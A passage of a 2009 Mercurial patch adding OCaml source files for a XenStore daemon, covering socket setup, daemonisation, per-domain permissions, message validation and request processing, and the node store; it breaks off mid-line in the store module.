xenstored_proc_dom0_port = "/proc/xen/xsd_dom0_port" +let xenstored_proc_dom0_mfn = "/proc/xen/xsd_dom0_mfn" +let xenstored_proc_kva = "/proc/xen/xsd_kva" +let xenstored_proc_port = "/proc/xen/xsd_port" + +(* Change the permissions for a socket address *) +let xsd_chmod addr = + match addr with + | Unix.ADDR_UNIX name -> Unix.chmod name 0o600 + | _ -> Utils.barf_perror "addr -- chmod oops" + +(* Get a XenStore daemon directory *) +let xsd_getdir env_var fallback = + try Sys.getenv env_var with Not_found -> fallback + +(* Create the given XenStore daemon directory, if needed *) +let xsd_mkdir name = + if not (Sys.file_exists name) then Unix.mkdir name 0o755 + +(* Return the XenStore daemon run directory *) +let xsd_rundir () = + xsd_getdir "XENSTORED_RUNDIR" "/var/run/xenstored" + +(* Return the XenStore daemon path *) +let xsd_socket_path () = + xsd_getdir "XENSTORED_PATH" ((xsd_rundir ()) ^ "/socket") + +(* Return the name of the XenStore daemon read-only socket *) +let xsd_socket_ro () = + (xsd_socket_path ()) ^ "_ro" + +(* Return the name of the XenStore daemon read-write socket *) +let xsd_socket_rw () = + xsd_socket_path () + +(* Remove the old sockets *) +let xsd_unlink addr = + match addr with + | Unix.ADDR_UNIX name -> if Sys.file_exists name then Unix.unlink name + | _ -> Utils.barf_perror "addr -- unlink oops" + +let conn_fds = Hashtbl.create 8 +let conn_id = ref (- 1) +let in_set = ref [] +let out_set = ref [] + +(* Accept a connection *) +let accept socket can_write in_set out_set = + let (fd, _) = Unix.accept socket in + let interface = new Socket.socket_interface fd can_write in_set out_set in + let connection = new Connection.connection interface in + let domu = new Domain.domain !conn_id connection in + decr conn_id; + Hashtbl.add conn_fds domu#id fd; + domu + +(* Create and listen to a socket *) +let create_socket socket_name = + xsd_mkdir (xsd_rundir ()); + let addr = Unix.ADDR_UNIX socket_name + and socket = Unix.socket Unix.PF_UNIX Unix.SOCK_STREAM 0 in + xsd_unlink addr; + Unix.bind socket addr; + xsd_chmod addr; + Unix.listen socket 1; + socket + +let filter_conn_fds conn_fds domains = + let active_conn_ids = List.fold_left (fun ids domain -> if domain#id < 0 then domain#id :: ids else ids) [] domains in + Hashtbl.iter (fun id fd -> if not (List.mem id active_conn_ids) then Hashtbl.remove conn_fds id) conn_fds + +(* Fork daemon *) +let fork_daemon () = + let pid = Unix.fork () in + if pid < 0 then Utils.barf_perror ("Failed to fork daemon: " ^ (string_of_int pid)); + if pid <> 0 then exit 0 + +(* Return the (input) socket connections *) +let get_input_socket_connections conn_fds = + Hashtbl.fold (fun _ fd rest -> fd :: rest) conn_fds [] + +(* Return the (output) socket connections *) +let get_output_socket_connections domains conn_fds = + List.fold_left (fun rest domain -> if domain#can_write then Hashtbl.find conn_fds domain#id :: rest else rest) [] (List.filter (fun domain -> Hashtbl.mem conn_fds domain#id) domains) + +(* Read a value from a proc file *) +let read_int_from_proc name = + let fd = Unix.openfile name [ Unix.O_RDONLY ] 0o600 + and buff = String.create 20 in + let int = Unix.read fd buff 0 (String.length buff) in + Unix.close fd; + if int <> Constants.null_file_descr then int_of_string (String.sub buff 0 int) else Constants.null_file_descr + +let socket_rw = create_socket (xsd_socket_rw ()) +let socket_ro = create_socket (xsd_socket_ro ()) +let special_fds = ref [ socket_rw; socket_ro ] + +(* Check connections *) +let check_connections xenstored event_chan = + filter_conn_fds conn_fds xenstored#domains#domains; + + let input_conns = get_input_socket_connections conn_fds + and output_conns = get_output_socket_connections xenstored#domains#domains conn_fds + and timeout = xenstored#domains#timeout in + + let (i_set, o_set, _) = Unix.select ((if event_chan <> Constants.null_file_descr then Socket.file_descr_of_int event_chan :: !special_fds else !special_fds) @ input_conns) output_conns [] timeout in + in_set := i_set; + out_set := o_set; + + if List.mem socket_rw !in_set then xenstored#add_domain (accept socket_rw true in_set out_set); + if List.mem socket_ro !in_set then xenstored#add_domain (accept socket_ro false in_set out_set) + +(* Check the event channel for an event *) +let check_event_chan event_chan = + List.mem (Socket.file_descr_of_int event_chan) !in_set + +(* Daemonise *) +let daemonise () = + (* Separate from parent via fork, so init inherits us *) + fork_daemon (); + + (* Session leader so ^C doesn't whack us *) + ignore (Unix.setsid ()); + + (* Let session leader exit so child cannot regain CTTY *) + fork_daemon (); + + (* Move off any mount points we might be in *) + (try Unix.chdir "/" with _ -> Utils.barf_perror "Failed to chdir"); + + (* Discard parent's old-fashioned umask prejudices *) + ignore (Unix.umask 0); + + (* Redirect outputs to null device *) + let dev_null = Unix.openfile "/dev/null" [ Unix.O_RDWR ] 0o600 in + Unix.dup2 dev_null Unix.stdin; + Unix.dup2 dev_null Unix.stdout; + Unix.dup2 dev_null Unix.stderr; + Unix.close dev_null + +(* Return the XenStore domain ID *) +let get_domxs_id () = + read_int_from_proc xenstored_proc_domid + +(* Return the Domain-0 mfn *) +let get_dom0_mfn () = + read_int_from_proc xenstored_proc_dom0_mfn + +(* Return the Domain-0 port *) +let get_dom0_port () = + read_int_from_proc xenstored_proc_dom0_port + +(* Return the pid *) +let get_pid () = + Unix.getpid () + +(* Return the current time *) +let get_time () = + let tm = Unix.localtime (Unix.gettimeofday ()) in + let year = tm.Unix.tm_year + 1900 + and month = tm.Unix.tm_mon + 1 + and day = tm.Unix.tm_mday + and hour = tm.Unix.tm_hour + and minute = tm.Unix.tm_min + and second = tm.Unix.tm_sec in + Printf.sprintf "%04d%02d%02d %02d:%02d:%02d" year month day hour minute second;; + +(* Return the XenBus port *) +let get_xenbus_port () = + let fd = Unix.openfile xenstored_proc_port [ Unix.O_RDONLY ] 0 + and str = String.create 20 in + let len = Unix.read fd str 0 (String.length str) in + Unix.close fd; + if len <> - 1 then int_of_string (String.sub str 0 len) else Constants.null_file_descr + +(* OS specific initialisation *) +let init () = + ignore (Sys.signal Sys.sigpipe Sys.Signal_ignore) + +(* Map XenBus page *) +let map_xenbus port = + let fd = Unix.openfile xenstored_proc_kva [ Unix.O_RDWR ] 0o600 in + let interface = new Xenbus.xenbus_interface port (Xenbus.mmap (Socket.int_of_file_descr fd)) in + Unix.close fd; + interface + +(* Extra option parsing, if needed *) +let parse_option option = + () + +(* Write PID file *) +let write_pid_file pid_file = + let fd = Unix.openfile pid_file [ Unix.O_RDWR; Unix.O_CREAT ] 0o600 in + + (* Exit silently if daemon already running *) + (try Unix.lockf fd Unix.F_TLOCK 0 with _ -> ignore (exit 0)); + + let pid = string_of_int (Unix.getpid ()) in + let len = String.length pid in + + try + if Unix.write fd pid 0 len <> len then Utils.barf_perror ("Writing pid file " ^ pid_file); + Unix.close fd + with _ -> Utils.barf_perror ("Writing pid file " ^ pid_file) diff -r 10a8fae412c5 tools/xenstore/permission.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/permission.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,111 @@ +(* + Permissions for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type access = + | NONE + | READ + | WRITE + | BOTH + +type t = + { + access : access; + domain_id : int + } + +let make access domain_id = + { + access = access; + domain_id = domain_id + } + +let permission_of_string string = + { + access = + (match string.[0] with + | 'n' -> NONE + | 'r' -> READ + | 'w' -> WRITE + | 'b' -> BOTH + | _ -> raise (Constants.Xs_error (Constants.EINVAL, "permission_of_string", string))); + domain_id = int_of_string (String.sub string 1 (pred (String.length string))) + } + +let string_of_permission permission = + let perm_str = + match permission.access with + | NONE -> "n" + | READ -> "r" + | WRITE -> "w" + | BOTH -> "b" in + perm_str ^ (string_of_int permission.domain_id) + +let check_access access1 access2 = + match access1 with + | READ | WRITE -> access2 = access1 || access2 = BOTH + | _ -> access2 = access1 + +let compare permission1 permission2 = + permission1.access = permission2.access && permission1.domain_id = permission2.domain_id + +let get_path path = + Store.root_path ^ ".permissions" ^ (if path = Store.root_path then Constants.null_string else path) + +class permissions = +object(self) + method add (store : string Store.store) (path : string) (domain_id : int) = + let domain_id = if domain_id < 0 then 0 else domain_id + and parent_path = Store.parent_path path in + if not (store#node_exists (get_path parent_path)) then self#add store parent_path domain_id; + let parent_permissions = self#get store parent_path in + let new_permissions = if domain_id = 0 then parent_permissions else make (List.hd parent_permissions).access domain_id :: List.tl parent_permissions in + self#set (List.map string_of_permission new_permissions) store path + method check (store : string Store.store) path access domain_id = + let domain_id = if domain_id < 0 then 0 else domain_id + and permissions = self#get store path in + if domain_id = 0 + then true + else + let default_permission = List.hd permissions + and actual_permissions = List.tl permissions in + if default_permission.domain_id = domain_id + then true + else check_access access (try (List.find (fun perm -> perm.domain_id = domain_id) actual_permissions).access with Not_found -> default_permission.access) + method get (store : string Store.store) (path : string) = + let ppath = get_path path in + match store#read_node ppath with + | Store.Value permissions | Store.Hack (permissions, _) -> List.map permission_of_string (Utils.split permissions) + | Store.Empty -> raise (Constants.Xs_error (Constants.EINVAL, "Permission.permissions#get", ppath)) + | Store.Children _ -> + let parent_path = Store.parent_path path in + let parent_permissions = self#get store parent_path in + self#set (List.map string_of_permission parent_permissions) store path; + parent_permissions + method remove (store : string Store.store) path = store#remove_node (get_path path) + method set (permissions : string list) (store : string Store.store) (path : string) = + let ppath = get_path path in + let parent_path = Store.parent_path path in + if not (path = Store.root_path) && not (store#node_exists (get_path parent_path)) + then ( + let domain_id = (permission_of_string (List.hd permissions)).domain_id in + self#add store parent_path domain_id + ); + ignore (try store#read_node ppath with _ -> store#create_node ppath; store#read_node ppath); + store#write_node ppath (Utils.combine_with_string permissions (String.make 1 Constants.null_char)); +end diff -r 10a8fae412c5 tools/xenstore/process.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/process.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,412 @@ +(* + Processing for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Check for a valid domain ID *) +let check_domain_id domain_id = + try int_of_string domain_id >= 0 with _ -> false + +(* Check for a valid domain ID (only parameter) *) +let check_domain_id_only payload = + let domain_id = List.hd (Utils.split payload) in + String.length domain_id = pred (String.length payload) && check_domain_id domain_id + +(* Check for 32-bit integer *) +let check_int int = + try ignore (Int32.of_string int); true with _ -> false + +(* Check introduce *) +let check_introduce payload = + let split = Utils.split payload in + let length = List.length split in + (length = 3 || length = 4) && check_domain_id (List.nth split 0) && check_int (List.nth split 1) && check_int (List.nth split 2) + +let rec check_chars path i = + if i >= String.length path + then true + else if not (String.contains Store.valid_characters path.[i]) + then false + else check_chars path (succ i) + +(* Check for a valid path *) +let check_path path = + if String.length path > 0 + then + if path.[pred (String.length path)] <> Store.dividor + then + if not (Utils.strstr path "//") + then + if Store.is_relative path + then + if String.length path <= Constants.relative_path_max + then check_chars path 0 + else false + else if String.sub path 0 (String.length Store.root_path) = Store.root_path + then + if String.length path <= Constants.absolute_path_max + then check_chars path 0 + else false + else false + else false + else if path = Store.root_path then true else false + else false + +(* Check for a valid path (only parameter) *) +let check_path_only payload = + let path = Utils.strip_null payload in + succ (String.length path) = String.length payload && check_path path + +let check_permissions payload = + let split = Utils.split payload in + let min_length = if payload.[pred (String.length payload)] = Constants.null_char then 2 else 3 + and perm_list = if payload.[pred (String.length payload)] = Constants.null_char then List.tl split else Utils.remove_last (List.tl split) in + List.length split >= min_length && check_path (List.nth split 0) && List.fold_left (fun accum perm -> accum && (try ignore (Permission.permission_of_string perm); true with _ -> false)) true perm_list + +(* Check for a valid transaction end *) +let check_transaction_end payload = + let value = Utils.strip_null payload in + succ (String.length value) = String.length payload && (value = Constants.payload_true || value = Constants.payload_false) + +(* Check for a valid transaction start *) +let check_transaction_start payload = + String.length payload = 1 && payload.[0] = Constants.null_char + +(* Check for a valid watch path *) +let check_watch_path path = + if Store.is_event path then check_chars path 0 else check_path path + +(* TODO: Check for a valid watch token *) +let check_watch_token token = + true + +(* Check for a valid watch/unwatch *) +let check_watch payload = + let split = Utils.split payload in + let length = List.length split in + (length = 2 || length = 3) && check_watch_path (List.nth split 0) && check_watch_token (List.nth split 1) + +let check_write payload = + let split = Utils.split payload in + let length = List.length split in + (length = 1 || length = 2) && check_path (List.nth split 0) + +(* Check a message to make sure the payload is valid *) +let check message = + match message.Message.header.Message.message_type with + | Message.XS_DIRECTORY -> check_path_only message.Message.payload + | Message.XS_GET_DOMAIN_PATH -> check_path_only message.Message.payload + | Message.XS_GET_PERMS -> check_path_only message.Message.payload + | Message.XS_INTRODUCE -> check_introduce message.Message.payload + | Message.XS_IS_DOMAIN_INTRODUCED -> check_path_only message.Message.payload + | Message.XS_MKDIR -> check_path_only message.Message.payload + | Message.XS_READ -> check_path_only message.Message.payload + | Message.XS_RELEASE -> check_path_only message.Message.payload + | Message.XS_RESUME -> check_path_only message.Message.payload + | Message.XS_RM -> check_path_only message.Message.payload + | Message.XS_SET_PERMS -> check_permissions message.Message.payload + | Message.XS_TRANSACTION_END -> check_transaction_end message.Message.payload + | Message.XS_TRANSACTION_START -> check_transaction_start message.Message.payload + | Message.XS_UNWATCH -> check_watch message.Message.payload + | Message.XS_WATCH -> check_watch message.Message.payload + | Message.XS_WRITE -> check_write message.Message.payload + | _ -> false + +(* Return the list of parent paths that will be created for a given path *) +let rec created_paths store path = + if store#node_exists path then [] else path :: created_paths store (Store.parent_path path) + +(* Return the list of child paths that will be deleted for a given path *) +let rec removed_paths store path = + match store#read_node path with + | Store.Children children | Store.Hack (_, children) -> List.fold_left (fun paths child -> paths @ (removed_paths store child#path)) [] children + | _ -> [ path ] + +(* Process a directory message *) +let process_directory domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in + try + if xenstored#permissions#check store path Permission.READ domain#id + then + let payload = + match store#read_node path with + | Store.Children (children) | Store.Hack (_, children) -> List.fold_left (fun children_string child -> if check_path child#path then children_string ^ (Utils.null_terminate (Store.base_path child#path)) else children_string) Constants.null_string children + | _ -> Constants.null_string in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EACCES) + with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno) + +(* Process a get domain path message *) +let process_get_domain_path domain store message = + let domid = Utils.strip_null message.Message.payload in + let path = Utils.null_terminate (Store.domain_root ^ domid) in + domain#add_output_message (Message.reply message path) + +(* Process a get permissions message *) +let process_get_perms domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in + if xenstored#permissions#check store path Permission.READ domain#id + then + let permissions = xenstored#permissions#get store path in + let payload = List.fold_left (fun permissions_string permission -> permissions_string ^ (Utils.null_terminate (Permission.string_of_permission permission))) Constants.null_string permissions in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process an introduce message *) +let process_introduce domain store xenstored message = + let split = Utils.split message.Message.payload in + let domid = List.nth split 0 + and mfn = List.nth split 1 + and port = List.nth split 2 + and reserved = if List.length split = 4 then List.nth split 3 else Constants.null_string in + if not (Domain.is_unprivileged domain) + then ( + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + let domu = Domain.domu_init (int_of_string domid) (int_of_string port) (int_of_string mfn) false in + xenstored#add_domain domu; + xenstored#watches#fire_watches "@introduceDomain" (message.Message.header.Message.transaction_id <> 0l) false; + domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process a is domains introduced message *) +let process_is_domain_introduced domain store xenstored message = + let domid = int_of_string (Utils.strip_null message.Message.payload) in + let domain_exists = try xenstored#domains#find_by_id domid; true with Not_found -> false in + let payload = Utils.null_terminate (if domid = Constants.domain_id_self || domain_exists then Constants.payload_true else Constants.payload_false) in + domain#add_output_message (Message.reply message payload) + +(* Process a mkdir message *) +let process_mkdir domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) + and transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + (* If permissions exist, node already exists *) + try + if xenstored#permissions#check store path Permission.WRITE domain#id + then domain#add_output_message (Message.ack message) + else domain#add_output_message (Message.error message Constants.EACCES) + with _ -> + try + if not (store#node_exists path) + then ( + let paths = created_paths store path in + store#create_node path; + xenstored#permissions#add store path domain#id; + List.iter (fun path -> xenstored#domain_entry_incr store transaction path) paths; + if message.Message.header.Message.transaction_id = 0l + then ( + xenstored#transactions#invalidate path; + xenstored#watches#fire_watches path false false + ) + ); + domain#add_output_message (Message.ack message) + with e -> raise e (*domain#add_output_message (Message.error message Constants.EINVAL)*) + +(* Process a read message *) +let process_read domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) in + try + if xenstored#permissions#check store path Permission.READ domain#id + then + let payload = + match store#read_node path with + | Store.Value value | Store.Hack (value, _) -> value + | _ -> Constants.null_string in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EACCES) + with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno) + +(* Process a release message *) +let process_release domain store xenstored message = + if domain#id <= 0 + then + let domu_id = int_of_string (Utils.strip_null message.Message.payload) in + try + xenstored#remove_domain (xenstored#domains#find_by_id domu_id); + if domu_id > 0 then xenstored#watches#fire_watches "@releaseDomain" false false; + domain#add_output_message (Message.ack message) + with Not_found -> domain#add_output_message (Message.error message Constants.ENOENT) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process a rm message *) +let process_rm domain store xenstored message = + let path = Store.canonicalise domain (Utils.strip_null message.Message.payload) + and transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + try + if store#node_exists path + then + if xenstored#permissions#check store path Permission.WRITE domain#id + then + if path <> Store.root_path + then ( + let paths = removed_paths store path in + List.iter (fun path -> xenstored#domain_entry_decr store transaction path) paths; + store#remove_node path; + xenstored#permissions#remove store path; + if message.Message.header.Message.transaction_id = 0l + then ( + xenstored#transactions#invalidate path; + xenstored#watches#fire_watches path false true + ); + domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.EINVAL) + else domain#add_output_message (Message.error message Constants.EACCES) + else if store#node_exists (Store.parent_path path) + then + if xenstored#permissions#check store (Store.parent_path path) Permission.WRITE domain#id + then domain#add_output_message (Message.ack message) + else domain#add_output_message (Message.error message Constants.EACCES) + else domain#add_output_message (Message.error message Constants.ENOENT) (* XXX: This might be wrong *) + with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno) + +(* Process a set permissions message *) +let process_set_perms domain store xenstored message = + let split = Utils.split message.Message.payload in + let path = Store.canonicalise domain (List.hd split) in + let (permissions, reserved) = + if message.Message.payload.[pred (String.length message.Message.payload)] = Constants.null_char + then (List.tl split, Constants.null_string) + else (Utils.remove_last (List.tl split), List.nth split (pred (List.length split))) in + if xenstored#permissions#check store path Permission.WRITE domain#id + then ( + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + try + xenstored#permissions#set permissions store path; + xenstored#watches#fire_watches path (message.Message.header.Message.transaction_id <> 0l) false; + domain#add_output_message (Message.ack message) + with _ -> domain#add_output_message (Message.error message Constants.EACCES) (* XXX: errno? *) + ) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process a transaction end message *) +let process_transaction_end domain store xenstored message = + let transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + if xenstored#transactions#exists transaction + then ( + Trace.destroy domain#id "transaction"; + if Utils.strip_null message.Message.payload = Constants.payload_true + then + if xenstored#commit transaction + then domain#add_output_message (Message.ack message) + else domain#add_output_message (Message.error message Constants.EAGAIN) + else domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.ENOENT) + +(* Process a transaction start message *) +let process_transaction_start domain store xenstored message = + try + if message.Message.header.Message.transaction_id = 0l + then + let transaction = xenstored#new_transaction domain store in + let payload = Utils.null_terminate (Int32.to_string transaction.Transaction.transaction_id) in + domain#add_output_message (Message.reply message payload) + else domain#add_output_message (Message.error message Constants.EBUSY) + with Constants.Xs_error (errno, _, _) -> domain#add_output_message (Message.error message errno) + +(* Process an unwatch message *) +let process_unwatch domain store xenstored message = + let split = Utils.split message.Message.payload in + let path = List.nth split 0 + and token = List.nth split 1 + and reserved = if List.length split = 3 then List.nth split 2 else Constants.null_string in + let relative = Store.is_relative path in + let actual_path = if relative then Store.canonicalise domain path else path in + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + if xenstored#watches#remove (Watch.make domain actual_path token relative) + then ( + Trace.destroy domain#id "watch"; + domain#add_output_message (Message.ack message) + ) + else domain#add_output_message (Message.error message Constants.ENOENT) + +(* Process a watch message *) +let process_watch domain store xenstored message = + let split = Utils.split message.Message.payload in + let path = List.nth split 0 + and token = List.nth split 1 + and reserved = if List.length split = 3 then List.nth split 2 else Constants.null_string in + let relative = Store.is_relative path in + let actual_path = if relative then Store.canonicalise domain path else path in + (* XXX: Reserved value *) + if String.length reserved > 0 then (); + if xenstored#add_watch domain (Watch.make domain actual_path token relative) + then ( + Trace.create domain#id "watch"; + domain#add_output_message (Message.ack message); + domain#add_output_message (Message.event ((Utils.null_terminate path) ^ (Utils.null_terminate token))) + ) + else domain#add_output_message (Message.error message Constants.EEXIST) + +(* Process a write message *) +let process_write domain store xenstored message = + let split = Utils.split message.Message.payload in + let path = Store.canonicalise domain (List.hd split) + and value = Utils.combine (List.tl split) in + let transaction = Transaction.make domain#id message.Message.header.Message.transaction_id in + if not (store#node_exists path) || xenstored#permissions#check store path Permission.WRITE domain#id + then + if Domain.is_unprivileged domain && String.length value >= xenstored#options.Option.quota_max_entry_size + then domain#add_output_message (Message.error message Constants.ENOSPC) + else + try + if not (store#node_exists path) + then ( + let paths = created_paths store path in + store#create_node path; + xenstored#permissions#add store path domain#id; + List.iter (fun path -> xenstored#domain_entry_incr store transaction path) paths + ); + store#write_node path value; + if message.Message.header.Message.transaction_id = 0l + then ( + xenstored#transactions#invalidate path; + xenstored#watches#fire_watches path false false + ); + domain#add_output_message (Message.ack message) + with e -> raise e (*domain#add_output_message (Message.error message Constants.EINVAL)*) (* XXX: Wrong error? *) + else domain#add_output_message (Message.error message Constants.EACCES) + +(* Process a message *) +let process (xenstored : Xenstored.xenstored) domain = + let message = domain#input_message in + let store = xenstored#transactions#store (Transaction.make domain#id message.Message.header.Message.transaction_id) in + if check message + then ( + match message.Message.header.Message.message_type with + | Message.XS_DIRECTORY -> process_directory domain store xenstored message + | Message.XS_GET_DOMAIN_PATH -> process_get_domain_path domain store message + | Message.XS_GET_PERMS -> process_get_perms domain store xenstored message + | Message.XS_INTRODUCE -> process_introduce domain store xenstored message + | Message.XS_IS_DOMAIN_INTRODUCED -> process_is_domain_introduced domain store xenstored message + | Message.XS_MKDIR -> process_mkdir domain store xenstored message + | Message.XS_READ -> process_read domain store xenstored message + | Message.XS_RELEASE -> process_release domain store xenstored message + | Message.XS_RM -> process_rm domain store xenstored message + | Message.XS_SET_PERMS -> process_set_perms domain store xenstored message + | Message.XS_TRANSACTION_END -> process_transaction_end domain store xenstored message + | Message.XS_TRANSACTION_START -> process_transaction_start domain store xenstored message + | Message.XS_UNWATCH -> process_unwatch domain store xenstored message + | Message.XS_WATCH -> process_watch domain store xenstored message + | Message.XS_WRITE -> process_write domain store xenstored message + | _ -> domain#add_output_message (Message.error message Constants.EINVAL) + ) + else domain#add_output_message (Message.error message Constants.EINVAL) diff -r 10a8fae412c5 tools/xenstore/socket.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/socket.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,46 @@ +(* + Socket for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Convert an int to a file descriptor *) +external file_descr_of_int : int -> Unix.file_descr = "%identity" + +(* Convert a file descriptor to an int *) +let int_of_file_descr fd = (Obj.magic (fd: Unix.file_descr) : int) + +(* Socket interface *) +class socket_interface fd can_write in_set out_set = +object (self) + inherit Interface.interface as super + val m_fd = fd + val m_can_write = can_write + val m_in_set = in_set + val m_out_set = out_set + method private fd = m_fd + method private in_set = !m_in_set + method private out_set = !m_out_set + method can_read = List.mem self#fd self#in_set + method can_write = can_write + method destroy = Unix.close self#fd + method read buffer offset length = + let bytes_read = Unix.read self#fd buffer offset length in + if bytes_read = 0 && length <> 0 + then raise (Constants.Xs_error (Constants.EIO, "socket_interface#read", "could not read data")) + else bytes_read + method write buffer offset length = Unix.write self#fd buffer offset (min length (String.length buffer)) +end diff -r 10a8fae412c5 tools/xenstore/store.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/store.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,144 @@ +(* + Store for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* XenStore node contents type *) +type ('node, 'contents) node_contents = + | Empty + | Value of 'contents + | Children of 'node list + | Hack of 'contents * 'node list + +let dividor = '/' +let dividor_str = String.make 1 dividor +let root_path = dividor_str +let domain_root = root_path ^ "local" ^ dividor_str ^ "domain" ^ dividor_str +let valid_characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/_@" + +(* Return the base path of a path *) +let base_path path = + if path = root_path + then path + else + let start = succ (String.rindex path dividor) in + String.sub path start ((String.length path) - start) + +(* Compare two nodes *) +let compare node1 node2 = + String.compare node1#path node2#path + +(* Check if a path is a child of another path *) +let is_child child parent = + if parent = root_path + then true + else + let length = min (String.length parent) (String.length child) in + if String.sub child 0 length <> String.sub parent 0 length + then false + else + let parent_length = String.length parent + and child_length = String.length child in + (* XXX: This returns child = parent *) + if parent_length = child_length + then true + else if parent_length < child_length then String.get child parent_length = dividor + else false + +(* Check if a path is an event path *) +let is_event path = + path.[0] = Constants.event_char + +(* Check if a path is a relative path *) +let is_relative path = + not (is_event path) && String.sub path 0 (String.length root_path) <> root_path + +(* Iterate over nodes applying function f to each node *) +let rec iter f node = + match node#contents with + | Empty -> () + | Children children -> List.iter (fun child -> iter f child) children + | Value value -> f value + | Hack (value, children) -> f value; List.iter (fun child -> iter f child) children + +(* Return the parent path of a path *) +let parent_path path = + let slash = String.rindex path dividor in + if slash = 0 then root_path else String.sub path 0 slash + +(* Return canonicalised path *) +let canonicalise domain path = + if not (is_relative path) then path else domain_root ^ (string_of_int domain#id) ^ dividor_str ^ path + +(* XenStore node type *) +class ['contents] node path (contents : ('contents node, 'contents) node_contents) = +object (self) + val m_path = path + val mutable m_contents = contents + method add_child child = + match self#contents with + | Empty -> m_contents <- Children [ child ]; true + | Value value -> m_contents <- Hack (value, [ child ]); true (* false *) + | Children children -> m_contents <- Children (List.sort compare (child :: children)); true + | Hack (value, children) -> m_contents <- Hack (value, List.sort compare (child :: children)); true + method contents = m_contents + method path = m_path + method get_child child_path = + match self#contents with + | Children children | Hack (_, children) -> ( + try List.find (fun child_node -> child_node#path = child_path) children + with Not_found -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#get_child", child_path)) + ) + | _ -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#get_child", child_path)) + method remove_child child_path = + match self#contents with + | Children children -> m_contents <- Children (List.filter (fun child_node -> child_node#path <> child_path) children) + | Hack (value, children) -> m_contents <- Hack (value, List.filter (fun child_node -> child_node#path <> child_path) children) + | _ -> raise (Constants.Xs_error (Constants.ENOENT, "Store.node#remove_child", path)) + method set_contents contents = m_contents <- contents +end + +class ['contents] store = +object (self) + val m_root : 'contents node = new node root_path (Children []) + method private construct_node path = + let parent_path = parent_path path in + let parent_node = try self#get_node parent_path with _ -> self#construct_node parent_path + and node = new node path Empty in + if parent_node#add_child node then node else raise (Constants.Xs_error (Constants.ENOENT, "Store.store#construct_node", path)) + method private get_node path = if path = root_path then self#root else (self#get_node (parent_path path))#get_child path + method private root = m_root + method create_node path = ignore (self#construct_node path) + method iter f = iter f self#root + method node_exists path = try ignore (self#get_node path); true with _ -> false + method read_node path = (self#get_node path)#contents + method remove_node path = (self#get_node (parent_path 